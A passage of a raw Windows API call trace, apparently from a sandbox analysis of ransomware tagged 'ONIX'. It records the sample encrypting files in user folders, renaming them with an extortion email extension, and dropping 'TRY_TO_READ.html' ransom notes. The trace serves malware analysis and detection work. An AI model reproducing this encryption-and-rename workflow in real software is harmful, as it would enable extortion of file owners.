HALPmcxz\\Documents\\tscZOceclriGcO7zOHOF.pptx" [0120.947] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tscZOceclriGcO7zOHOF.pptx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tscZOceclriGcO7zOHOF.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tscZOceclriGcO7zOHOF.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.947] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=100223) returned 1 [0120.947] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1877f [0120.947] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.947] GetProcessHeap () returned 0x410000 [0120.947] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.947] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.949] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.950] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.951] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.952] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1877f) returned 0xf50048 [0120.953] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1877f) returned 0xf687d0 [0120.953] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.953] ReadFile (in: hFile=0x4a8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x1877f, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x1877f, lpOverlapped=0x0) returned 1 [0120.958] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1877f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.958] CloseHandle (hObject=0x4a8) returned 1 [0120.961] GetProcessHeap () returned 0x410000 [0120.961] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.961] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tscZOceclriGcO7zOHOF.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tsczoceclrigco7zohof.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tscZOceclriGcO7zOHOF.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tsczoceclrigco7zohof.pptx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.964] GetProcessHeap () returned 0x410000 [0120.964] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0120.964] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69bc47b0, ftCreationTime.dwHighDateTime=0x1d5c6fd, ftLastAccessTime.dwLowDateTime=0x4c5cc6e0, ftLastAccessTime.dwHighDateTime=0x1d56ef1, ftLastWriteTime.dwLowDateTime=0x4c5cc6e0, ftLastWriteTime.dwHighDateTime=0x1d56ef1, nFileSizeHigh=0x0, nFileSizeLow=0x1877f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tscZOceclriGcO7zOHOF.pptx", cAlternateFileName="TSCZOC~1.PPT")) returned 0 [0120.964] CloseHandle (hObject=0x3cc) returned 1 [0120.964] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.964] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x150)) [0120.964] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0120.964] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0120.965] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0120.965] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads9c354ca09c354b444c.lock") returned 63 [0120.965] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0120.965] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.965] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.966] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0120.966] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ee30 [0120.966] FindNextFileW (in: hFindFile=0x48ee30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0120.966] FindNextFileW (in: hFindFile=0x48ee30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0120.966] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4ac [0120.966] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.967] LockFile (hFile=0x4ac, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x11a, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.967] SetFilePointerEx (in: hFile=0x4ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0120.967] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.967] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.967] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.967] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini", dwFileAttributes=0x80) returned 1 [0121.291] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 52 [0121.291] GetProcessHeap () returned 0x410000 [0121.291] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8) returned 0x43a518 [0121.291] lstrcpyW (in: lpString1=0x43a518, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" [0121.291] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.291] GetFileSizeEx (in: hFile=0x4ac, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=282) returned 1 [0121.291] SetFilePointer (in: hFile=0x4ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x11a [0121.291] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.291] GetProcessHeap () returned 0x410000 [0121.291] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0121.291] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.293] WriteFile (in: hFile=0x4ac, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.295] WriteFile (in: hFile=0x4ac, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.297] WriteFile (in: hFile=0x4ac, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.298] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11a) returned 0x44faf8 [0121.298] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11a) returned 0x442938 [0121.298] SetFilePointer (in: hFile=0x4ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.298] ReadFile (in: hFile=0x4ac, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x11a, lpOverlapped=0x0) returned 1 [0121.298] SetFilePointer (in: hFile=0x4ac, lDistanceToMove=-282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.298] WriteFile (in: hFile=0x4ac, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x11a, lpOverlapped=0x0) returned 1 [0121.299] UnlockFile (hFile=0x4ac, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x11a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.299] CloseHandle (hObject=0x4ac) returned 1 [0121.300] GetProcessHeap () returned 0x410000 [0121.300] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0121.300] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.304] GetProcessHeap () returned 0x410000 [0121.304] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43a518 | out: hHeap=0x410000) returned 1 [0121.304] FindNextFileW (in: hFindFile=0x48ee30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32860770, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0121.304] FindNextFileW (in: hFindFile=0x48ee30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32860770, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0121.304] CloseHandle (hObject=0x3cc) returned 1 [0121.304] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.305] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x2a7)) [0121.305] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.305] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.305] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.305] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites9c354ca09c354b444c.lock") returned 63 [0121.305] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.306] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.306] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.306] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1810 [0121.306] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ee70 [0121.306] FindNextFileW (in: hFindFile=0x48ee70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0121.306] FindNextFileW (in: hFindFile=0x48ee70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0121.306] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4b0 [0121.306] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.307] LockFile (hFile=0x4b0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x192, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.307] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0121.307] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.307] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0121.307] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.307] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", dwFileAttributes=0x80) returned 1 [0121.307] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 52 [0121.307] GetProcessHeap () returned 0x410000 [0121.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8) returned 0x43a518 [0121.307] lstrcpyW (in: lpString1=0x43a518, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" [0121.307] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.307] GetFileSizeEx (in: hFile=0x4b0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=402) returned 1 [0121.307] SetFilePointer (in: hFile=0x4b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x192 [0121.307] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.307] GetProcessHeap () returned 0x410000 [0121.307] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0121.307] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.308] WriteFile (in: hFile=0x4b0, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.310] WriteFile (in: hFile=0x4b0, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.311] WriteFile (in: hFile=0x4b0, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.312] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x192) returned 0x442938 [0121.312] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x192) returned 0x46a0f0 [0121.312] SetFilePointer (in: hFile=0x4b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.312] ReadFile (in: hFile=0x4b0, lpBuffer=0x442938, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x192, lpOverlapped=0x0) returned 1 [0121.312] SetFilePointer (in: hFile=0x4b0, lDistanceToMove=-402, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.312] WriteFile (in: hFile=0x4b0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x192, lpOverlapped=0x0) returned 1 [0121.313] UnlockFile (hFile=0x4b0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x192, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.313] CloseHandle (hObject=0x4b0) returned 1 [0121.314] GetProcessHeap () returned 0x410000 [0121.314] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0121.314] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.317] GetProcessHeap () returned 0x410000 [0121.318] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43a518 | out: hHeap=0x410000) returned 1 [0121.318] FindNextFileW (in: hFindFile=0x48ee70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0121.318] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0121.321] FindNextFileW (in: hFindFile=0x48ee70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, 